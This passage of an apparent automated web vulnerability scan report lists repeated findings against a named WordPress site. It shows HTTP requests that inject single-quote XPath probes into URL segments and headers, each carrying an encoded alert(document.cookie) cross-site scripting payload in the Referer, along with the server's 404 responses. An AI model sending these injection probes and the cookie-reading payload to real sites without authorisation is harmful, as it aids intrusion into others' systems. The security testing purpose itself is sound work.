<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.62. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 6, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes'/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.63. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 7 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 7, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx'/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.64. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The REST URL parameter 8 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 8, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.65. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:15 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.66. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.67. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.68. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.69. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.70. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js'/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.71. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox'/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.72. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes'/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.73. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx'/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.74. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

1.75. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.76. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.77. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.78. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.79. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:22 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
